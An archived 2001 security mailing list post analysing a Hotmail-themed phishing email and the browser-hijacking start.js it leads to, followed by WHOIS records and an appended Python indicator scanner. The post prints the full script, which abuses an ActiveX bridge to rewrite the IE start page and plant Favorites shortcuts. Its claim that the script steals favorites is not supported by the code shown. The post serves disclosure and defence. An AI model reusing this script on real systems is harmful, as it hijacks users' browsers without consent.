Vulnerability Development mailing list archives
Hotmail message malware
From: quentyn () fotango com
Date: Fri, 10 Aug 2001 14:09:24 +0100
There appears to be a new Hotmail malware thingy. It is sent from admin02 () hotmail com with the subject line of "Password Change". Wonder how many people it will get before all the sites are closed?

Detail - I just received this mail from 202.104.122.157 [1]

#START
From admin02 () hotmail com Thu, 09 Aug 2001 18:21:54 -0700
Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700
Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
From: admin02 () hotmail com
To: ${MYEMAIL}@hotmail.com
Subject: Password Change
Date: Sat, 8 Sep 2001 08:13:32
Mime-Version: 1.0
Content-Type: text/html; charset="DEFAULT_CHARSET"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700

<HTML>
<HEAD>
</HEAD>
<BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B" ALINK="#FF0000">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change Confirmation</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully changed. Please remember your new Password. </B></FONT></P>
<P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this please click here to restore your old password.</A></FONT> </P>
</BODY>
</HTML>
#END

Now going to maeveshomepage.com/ty.htm [2] in Opera shows

#START
<!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY BGCOLOR="#336699">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been restored.</FONT>
<SCRIPT SRC="start.js"> </SCRIPT>
</P>
</BODY>
</HTML>
#END

and looking at start.js (the interesting bit)

#START
// Hidden applet: the MS JVM ActiveX bridge, used below to instantiate COM objects by CLSID
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")

// Drops a .URL shortcut into the given folder
function AddFavLnk(loc, DispName, SiteURL) {
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName + ".URL");
  Shor.TargetPath = SiteURL;
  Shor.Save();
}

function f() {
  try {
    a1 = document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  // WScript.Shell
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  // Scripting.FileSystemObject
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  // WScript.Network
    a1.createInstance();
    Net = a1.GetObject();
    try {
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie = "Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      //////////////////////////////////////////////////// Home page
      Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
      var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
      document.cookie = "Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      var WF, Shor, loc;
      WF = FSO.GetSpecialFolder(0);  // Windows folder
      loc = WF + "\\Favorites";
      if (!FSO.FolderExists(loc)) {
        loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
        if (!FSO.FolderExists(loc)) {
          return;
        }
      }
      //////////////////////////////////////////////////// Favorites
      AddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com");
      AddFavLnk(loc, " Aol", "http://www.aol.com");
    } catch (e) { }
  } catch (e) { }
}

function init() {
  setTimeout("f()", 1000);
}
init();
#END

It appears to set your default home page to http://yahhooo.devil.ru/ [3] and get your favorites (which may contain saved usernames and passwords).

Anybody got anything further?

Q

Notes

[1] -
inetnum: 202.104.122.128 - 202.104.122.159
netname: SHENZHEN-JLXXCY-INFOR-LTD
descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
country: CN
admin-c: HB58-AP
tech-c: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadm () gddc com cn 20000920
source: APNIC

person: HU BOG
address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
country: CN
phone: +86-755-3521135
fax-no: +86-755-3396971
e-mail: ipuser () gddc com cn
nic-hdl: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadm () gddc com cn 20000920
source: APNIC

[2] -
Registrant:
JBO
223 S. 5th
usa, O ---
US

Domain Name: MAEVESHOMEPAGE.COM

Administrative Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212

Technical Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212

Billing Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212

Record last updated on 11-Jul-2001.
Record expires on 07-May-2002.
Record Created on 07-May-2001.

Domain servers in listed order:
NS1.VEGASSECURE.NET 208.50.15.6
NS2.VEGASSECURE.NET 208.50.15.7

[3] -
domain: DEVIL.RU
type: CORPORATE
admin-o: AK2000-RIPN
nserver: ns.kravchenko.ru.
nserver: srvr.list.ru.
created: 07-AUG-2000
state: Delegated
changed: 19-MAY-2001
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN

person: Andrey S Kravchenko
nic-hdl: AK2000-RIPN
address: Teatralny st 23a/30,
address: Donetsk, Ukraine, 340100
phone: +7 902 6010000
fax-no: +7 902 6010000
e-mail: andrey () kravchenko ru
changed: 18-AUG-2000
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN

--
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
You're damn right we need a rational code of morality and ethics. But not much progress can be made in that direction while we've still got a majority ranting about gods, devils, souls, and absolute morality, and using an ancient book written by ignorant nomads as a guide.
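The indicators a defender can pull out of a page script like the quoted start.js (the ActiveX bridge applet, the CLSIDs it instantiates, the registry write to the IE start page, the shortcut drop), as an added example that is not part of the original post: the sample text is a constructed excerpt modelled on the quoted script, and the CLSID-to-ProgID mapping is supplied here.

```python
import re

# Constructed sample modelled on the start.js quoted in the post above
# (not the original file); only the indicator-bearing lines are kept.
SAMPLE_JS = r'''
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/");
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
'''

# CLSIDs of the Windows Script Host / Scripting Runtime objects the script
# instantiates through the MS JVM ActiveX bridge.
KNOWN_CLSIDS = {
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
    "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Network",
}


def scan_script(text):
    """Return a list of (indicator, detail) findings for a page script."""
    findings = []
    if re.search(r"com\.ms\.activeX\.ActiveXComponent", text, re.I):
        findings.append(("activex-bridge", "com.ms.activeX.ActiveXComponent applet"))
    for m in re.finditer(r'setCLSID\(\s*"\{([0-9A-Fa-f-]{36})\}"', text):
        clsid = m.group(1).upper()
        findings.append(("clsid", KNOWN_CLSIDS.get(clsid, "unknown " + clsid)))
    for m in re.finditer(r'RegWrite\s*\(\s*"([^"]+)"\s*,\s*"([^"]+)"', text):
        key = m.group(1).replace("\\\\", "\\")  # undo JS string escaping
        findings.append(("regwrite", key + " = " + m.group(2)))
    if re.search(r"\.CreateShortcut\s*\(", text):
        findings.append(("shortcut", "CreateShortcut call (.URL shortcut drop)"))
    return findings


def is_suspicious(text):
    """Bridge applet plus a scripting-host object is the telltale combination."""
    kinds = {kind for kind, _ in scan_script(text)}
    return "activex-bridge" in kinds and "clsid" in kinds


if __name__ == "__main__":
    for kind, detail in scan_script(SAMPLE_JS):
        print(kind, "-", detail)
```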